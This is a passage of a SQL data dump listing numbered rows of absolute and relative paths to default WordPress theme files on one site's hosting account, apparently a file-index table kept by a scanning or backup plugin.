archive.php'),(13196,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/comments.php','wp-content/themes/twentysixteen/comments.php'),(13197,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/css/blocks.css','wp-content/themes/twentysixteen/css/blocks.css'),(13198,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/css/editor-blocks.css','wp-content/themes/twentysixteen/css/editor-blocks.css'),(13199,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/css/editor-style.css','wp-content/themes/twentysixteen/css/editor-style.css'),(13200,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/css/ie.css','wp-content/themes/twentysixteen/css/ie.css'),(13201,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/css/ie7.css','wp-content/themes/twentysixteen/css/ie7.css'),(13202,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/css/ie8.css','wp-content/themes/twentysixteen/css/ie8.css'),(13203,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/footer.php','wp-content/themes/twentysixteen/footer.php'),(13204,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/functions.php','wp-content/themes/twentysixteen/functions.php'),(13205,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/COPYING.txt','wp-content/themes/twentysixteen/genericons/COPYING.txt'),(13206,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/Genericons.eot','wp-content/themes/twentysixteen/genericons/Genericons.eot'),(13207,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/Genericons.svg','wp-content/themes/twentysixteen/genericons/Genericons.svg'),(13208,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/Genericons.ttf','wp-content/themes/twentysixteen/genericons/Genericons.ttf'),(13209,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/Genericons.woff','wp-content/themes/twentysixteen/genericons/Genericons.woff'),(13210,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/LICENSE.txt','wp-content/themes/twentysixteen/genericons/LICENSE.txt'),(13211,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/README.md','wp-content/themes/twentysixteen/genericons/README.md'),(13212,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/genericons.css','wp-content/themes/twentysixteen/genericons/genericons.css'),(13213,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/header.php','wp-content/themes/twentysixteen/header.php'),(13214,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/image.php','wp-content/themes/twentysixteen/image.php'),(13215,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/inc/back-compat.php','wp-content/themes/twentysixteen/inc/back-compat.php'),(13216,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/inc/customizer.php','wp-content/themes/twentysixteen/inc/customizer.php'),(13217,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/inc/template-tags.php','wp-content/themes/twentysixteen/inc/template-tags.php'),(13218,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/index.php','wp-content/themes/twentysixteen/index.php'),(13219,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/js/color-scheme-control.js','wp-content/themes/twentysixteen/js/color-scheme-control.js'),(13220,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/js/customize-preview.js','wp-content/themes/twentysixteen/js/customize-preview.js'),(13221,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/js/functions.js','wp-content/themes/twentysixteen/js/functions.js'),(13222,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/js/html5.js','wp-content/themes/twentysixteen/js/html5.js'),(13223,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/js/keyboard-image-navigation.js','wp-content/themes/twentysixteen/js/keyboard-image-navigation.js'),(13224,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/js/skip-link-focus-fix.js','wp-content/themes/twentysixteen/js/skip-link-focus-fix.js'),(13225,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/page.php','wp-content/themes/twentysixteen/page.php'),(13226,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/readme.txt','wp-content/themes/twentysixteen/readme.txt'),(13227,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/rtl.css','wp-content/themes/twentysixteen/rtl.css'),(13228,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/screenshot.png','wp-content/themes/twentysixteen/screenshot.png'),(13229,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/search.php','wp-content/themes/twentysixteen/search.php'),(13230,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/searchform.php','wp-content/themes/twentysixteen/searchform.php'),(13231,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/sidebar-content-bottom.php','wp-content/themes/twentysixteen/sidebar-content-bottom.php'),(13232,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/sidebar.php','wp-content/themes/twentysixteen/sidebar.php'),(13233,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/single.php','wp-content/themes/twentysixteen/single.php'),(13234,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/style.css','wp-content/themes/twentysixteen/style.css'),(13235,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/template-parts/biography.php','wp-content/themes/twentysixteen/template-parts/biography.php'),(13236,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/template-parts/content-none.php','wp-content/themes/twentysixteen/template-parts/content-none.php'),(13237,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/template-parts/content-page.php','wp-content/themes/twentysixteen/template-parts/content-page.php'),(13238,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/template-parts/content-search.php','wp-content/themes/twentysixteen/template-parts/content-search.php'),(13239,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/template-parts/content-single.php','wp-content/themes/twentysixteen/template-parts/content-single.php'),(13240,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/template-parts/content.php','wp-content/themes/twentysixteen/template-parts/content.php'),(13241,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/404.php','wp-content/themes/twentytwenty/404.php'),(13242,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css','wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css'),(13243,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/css/editor-style-block.css','wp-content/themes/twentytwenty/assets/css/editor-style-block.css'),(13244,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css','wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css'),(13245,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/css/editor-style-classic.css','wp-content/themes/twentytwenty/assets/css/editor-style-classic.css'),(13246,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2'),(13247,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2'),(13248,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png','wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png'),(13249,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png','wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png'),(13250,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-square-1.png','wp-content/themes/twentytwenty/assets/images/2020-square-1.png'),(13251,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-square-2.png','wp-content/themes/twentytwenty/assets/images/2020-square-2.png'),(13252,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png'),(13253,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png'),(13254,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png'),(13255,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png'),(13256,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/js/color-calculations.js','wp-content/themes/twentytwenty/assets/js/color-calculations.js'),(13257,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/js/customize-controls.js','wp-content/themes/twentytwenty/assets/js/customize-controls.js'),(13258,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/js/customize-preview.js','wp-content/themes/twentytwenty/assets/js/customize-preview.js'),(13259,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/js/customize.js','wp-content/themes/twentytwenty/assets/js/customize.js'),(13260,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/js/editor-script-block.js','wp-content/themes/twentytwenty/assets/js/editor-script-block.js'),(13261,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/js/index.js','wp-content/themes/twentytwenty/assets/js/index.js'),(13262,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js','wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js'),(13263,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php','wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php'),(13264,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php','wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php'),(13265,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php','wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php'),(13266,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php','wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php'),(13267,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php','wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php'),(13268,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php'),(13269,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php'),(13270,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/comments.php','wp-content/themes/twentytwenty/comments.php'),(13271,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/footer.php','wp-content/themes/twentytwenty/footer.php'),(13272,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/functions.php','wp-content/themes/twentytwenty/functions.php'),(13273,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/header.php','wp-content/themes/twentytwenty/header.php'),(13274,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/inc/custom-css.php','wp-content/themes/twentytwenty/inc/custom-css.php'),(13275,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/inc/starter-content.php','wp-content/themes/twentytwenty/inc/starter-content.php'),(13276,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/inc/svg-icons.php','wp-content/themes/twentytwenty/inc/svg-icons.php'),(13277,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/inc/template-tags.php','wp-content/themes/twentytwenty/inc/template-tags.php'),(13278,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/index.php','wp-content/themes/twentytwenty/index.php'),(13279,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/print.css','wp-content/themes/twentytwenty/print.css'),(13280,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/readme.txt','wp-content/themes/twentytwenty/readme.txt'),(13281,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/screenshot.png','wp-content/themes/twentytwenty/screenshot.png'),(13282,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/searchform.php','wp-content/themes/twentytwenty/searchform.php'),(13283,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/singular.php','wp-content/themes/twentytwenty/singular.php'),(13284,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/style-rtl.css','wp-content/themes/twentytwenty/style-rtl.css'),(13285,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/style.css','wp-content/themes/twentytwenty/style.css'),(13286,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/content-cover.php','wp-content/themes/twentytwenty/template-parts/content-cover.php'),(13287,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/content.php','wp-content/themes/twentytwenty/template-parts/content.php'),(13288,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/entry-author-bio.php','wp-content/themes/twentytwenty/template-parts/entry-author-bio.php'),(13289,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/entry-header.php','wp-content/themes/twentytwenty/template-parts/entry-header.php'),(13290,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/featured-image.php','wp-content/themes/twentytwenty/template-parts/featured-image.php'),(13291,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php','wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php'),(13292,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/modal-menu.php','wp-content/themes/twentytwenty/template-parts/modal-menu.php'),(13293,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/modal-search.php','wp-content/themes/twentytwenty/template-parts/modal-search.php'),(13294,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/navigation.php','wp-content/themes/twentytwenty/template-parts/navigation.php'),(13295,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/pagination.php','wp-content/themes/twentytwenty/template-parts/pagination.php'),(13296,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/templates/template-cover.php','wp-content/themes/twentytwenty/templates/template-cover.php'),(13297,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/templates/template-full-width.php','wp-content/themes/twentytwenty/templates/template-full-width.php'),(13298,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/css/button-outline.css','wp-content/themes/twentytwentyfour/assets/css/button-outline.css'),(13299,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/LICENSE.txt','wp-content/themes/twentytwentyfour/assets/fonts/cardo/LICENSE.txt'),(13300,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff2','wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff2'),(13301,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_400.woff2','wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_400.woff2'),(13302,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woff2','wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woff2'),(13303,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-Italic-VariableFont_wdth,wght.woff2','wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-Italic-VariableFont_wdth,wght.woff2'),(13304,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-VariableFont_wdth,wght.woff2','wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-VariableFont_wdth,wght.woff2'),(13305,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/OFL.txt','wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/OFL.txt'),(13306,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_slnt,wght.woff2','wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_slnt,wght.woff2'),(13307,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/inter/LICENSE.txt','wp-content/themes/twentytwentyfour/assets/fonts/inter/LICENSE.txt'),(13308,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-Italic-VariableFont_wght.woff2','wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-Italic-VariableFont_wght.woff2'),(13309,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-VariableFont_wght.woff2','wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-VariableFont_wght.woff2'),(13310,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/jost/OFL.txt','wp-content/themes/twentytwentyfour/assets/fonts/jost/OFL.txt'),(13311,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/abstract-geometric-art.webp','wp-content/themes/twentytwentyfour/assets/images/abstract-geometric-art.webp'),(13312,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/angular-roof.webp','wp-content/themes/twentytwentyfour/assets/images/angular-roof.webp'),(13313,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/art-gallery.webp','wp-content/themes/twentytwentyfour/assets/images/art-gallery.webp'),(13314,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/building-exterior.webp','wp-content/themes/twentytwentyfour/assets/images/building-exterior.webp'),(13315,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/green-staircase.webp','wp-content/themes/twentytwentyfour/assets/images/green-staircase.webp'),(13316,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/hotel-facade.webp','wp-content/themes/twentytwentyfour/assets/images/hotel-facade.webp'),(13317,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/icon-message.webp','wp-content/themes/twentytwentyfour/assets/images/icon-message.webp'),(13318,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/museum.webp','wp-content/themes/twentytwentyfour/assets/images/museum.webp'),(13319,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/tourist-and-building.webp','wp-content/themes/twentytwentyfour/assets/images/tourist-and-building.webp'),(13320,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/windows.webp','wp-content/themes/twentytwentyfour/assets/images/windows.webp'),(13321,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/functions.php','wp-content/themes/twentytwentyfour/functions.php'),(13322,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/parts/footer.html','wp-content/themes/twentytwentyfour/parts/footer.html'),(13323,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/parts/header.html','wp-content/themes/twentytwentyfour/parts/header.html'),(13324,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/parts/post-meta.html','wp-content/themes/twentytwentyfour/parts/post-meta.html'),(13325,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/parts/sidebar.html','wp-content/themes/twentytwentyfour/parts/sidebar.html'),(13326,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/banner-hero.php','wp-content/themes/twentytwentyfour/patterns/banner-hero.php'),(13327,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/banner-project-description.php','wp-content/themes/twentytwentyfour/patterns/banner-project-description.php'),(13328,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/cta-content-image-on-right.php','wp-content/themes/twentytwentyfour/patterns/cta-content-image-on-right.php'),(13329,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/cta-pricing.php','wp-content/themes/twentytwentyfour/patterns/cta-pricing.php'),(13330,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/cta-rsvp.php','wp-content/themes/twentytwentyfour/patterns/cta-rsvp.php'),(13331,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/cta-services-image-left.php','wp-content/themes/twentytwentyfour/patterns/cta-services-image-left.php'),(13332,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/cta-subscribe-centered.php','wp-content/themes/twentytwentyfour/patterns/cta-subscribe-centered.php'),(13333,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/footer-centered-logo-nav.php','wp-content/themes/twentytwentyfour/patterns/footer-centered-logo-nav.php'),(13334,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/footer-colophon-3-col.php','wp-content/themes/twentytwentyfour/patterns/footer-colophon-3-col.php'),(13335,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/footer.php','wp-content/themes/twentytwentyfour/patterns/footer.php'),(13336,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/gallery-full-screen-image.php','wp-content/themes/twentytwentyfour/patterns/gallery-full-screen-image.php'),(13337,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php','wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php'),(13338,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-3-col.php','wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-3-col.php'),(13339,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-4-col.php','wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-4-col.php'),(13340,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/gallery-project-layout.php','wp-content/themes/twentytwentyfour/patterns/gallery-project-layout.php'),(13341,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/hidden-404.php','wp-content/themes/twentytwentyfour/patterns/hidden-404.php'),(13342,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/hidden-comments.php','wp-content/themes/twentytwentyfour/patterns/hidden-comments.php'),(13343,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/hidden-no-results.php','wp-content/themes/twentytwentyfour/patterns/hidden-no-results.php'),(13344,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/hidden-portfolio-hero.php','wp-content/themes/twentytwentyfour/patterns/hidden-portfolio-hero.php'),(13345,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/hidden-post-meta.php','wp-content/themes/twentytwentyfour/patterns/hidden-post-meta.php'),(13346,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/hidden-post-navigation.php','wp-content/themes/twentytwentyfour/patterns/hidden-post-navigation.php'),(13347,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/hidden-search.php','wp-content/themes/twentytwentyfour/patterns/hidden-search.php'),(13348,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/hidden-sidebar.php','wp-content/themes/twentytwentyfour/patterns/hidden-sidebar.php'),(13349,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-about-business.php','wp-content/themes/twentytwentyfour/patterns/page-about-business.php'),(13350,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-home-blogging.php','wp-content/themes/twentytwentyfour/patterns/page-home-blogging.php'),(13351,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-home-business.php','wp-content/themes/twentytwentyfour/patterns/page-home-business.php'),(13352,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-home-portfolio-gallery.php','wp-content/themes/twentytwentyfour/patterns/page-home-portfolio-gallery.php'),(13353,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-home-portfolio.php','wp-content/themes/twentytwentyfour/patterns/page-home-portfolio.php'),(13354,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php','wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php'),(13355,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-portfolio-overview.php','wp-content/themes/twentytwentyfour/patterns/page-portfolio-overview.php'),(13356,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-rsvp-landing.php','wp-content/themes/twentytwentyfour/patterns/page-rsvp-landing.php'),(13357,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-1-col.php','wp-content/themes/twentytwentyfour/patterns/posts-1-col.php'),(13358,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-3-col.php','wp-content/themes/twentytwentyfour/patterns/posts-3-col.php'),(13359,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-grid-2-col.php','wp-content/themes/twentytwentyfour/patterns/posts-grid-2-col.php'),(13360,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-images-only-3-col.php','wp-content/themes/twentytwentyfour/patterns/posts-images-only-3-col.php'),(13361,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-images-only-offset-4-col.php','wp-content/themes/twentytwentyfour/patterns/posts-images-only-offset-4-col.php'),(13362,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/posts-list.php','wp-content/themes/twentytwentyfour/patterns/posts-list.php'),(13363,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/team-4-col.php','wp-content/themes/twentytwentyfour/patterns/team-4-col.php'),(13364,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-archive-blogging.php','wp-content/themes/twentytwentyfour/patterns/template-archive-blogging.php'),(13365,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-archive-portfolio.php','wp-content/themes/twentytwentyfour/patterns/template-archive-portfolio.php'),(13366,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-home-blogging.php','wp-content/themes/twentytwentyfour/patterns/template-home-blogging.php'),(13367,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-home-business.php','wp-content/themes/twentytwentyfour/patterns/template-home-business.php'),(13368,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-home-portfolio.php','wp-content/themes/twentytwentyfour/patterns/template-home-portfolio.php'),(13369,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-index-blogging.php','wp-content/themes/twentytwentyfour/patterns/template-index-blogging.php'),(13370,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-index-portfolio.php','wp-content/themes/twentytwentyfour/patterns/template-index-portfolio.php'),(13371,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-search-blogging.php','wp-content/themes/twentytwentyfour/patterns/template-search-blogging.php'),(13372,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-search-portfolio.php','wp-content/themes/twentytwentyfour/patterns/template-search-portfolio.php'),(13373,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/template-single-portfolio.php','wp-content/themes/twentytwentyfour/patterns/template-single-portfolio.php'),(13374,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/testimonial-centered.php','wp-content/themes/twentytwentyfour/patterns/testimonial-centered.php'),(13375,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/text-alternating-images.php','wp-content/themes/twentytwentyfour/patterns/text-alternating-images.php'),(13376,'/home/tummmyov/tummyrevolution.com/wp-co